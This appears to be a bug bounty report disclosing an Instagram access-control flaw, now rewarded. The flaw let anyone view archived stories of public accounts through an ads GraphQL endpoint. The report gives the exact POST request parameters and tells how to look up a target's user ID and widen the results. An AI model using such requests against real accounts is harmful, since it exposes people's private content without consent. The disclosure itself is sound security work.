All archived stories of any Business/Creators/Public Instagram Accounts can be disclosed by using IG User ID.
Impact
Archived stories can only be viewed by the story-owner/story-creator or branded content partner(added to story) but an attacker was able to view almost all archived stories of any public IG user.
Reproduction Steps
Send POST request to i.instagram.com/api/v1/ads/graphql/ with parametersdoc_id=3271888XXXXXXXXX&query_params={"count":15,"cursor":"0","timeframe":"LIFETIME","searchBase":"USER","promoteEligibility":"ELIGIBLE","trackingCondition":"CREATED_BEFORE_TRACKING_INCLUDED","is_user":"true","queryParams":{"access_token":"","id":"USER_ID"}}
Where USER_ID is user ID of targeted IG account. (can be obtained by using instagram.com/[username]/?__a=1)
Change cursor value for navigation(or count value to a large number).
timeframe can be weekly, monthly, yearly or lifetime.
By changing promoteEligibility to ALL, an attacker can access all Ineligible, eligible(for promotion) stories.
Timeline
25 August 2021 : Bounty Awarded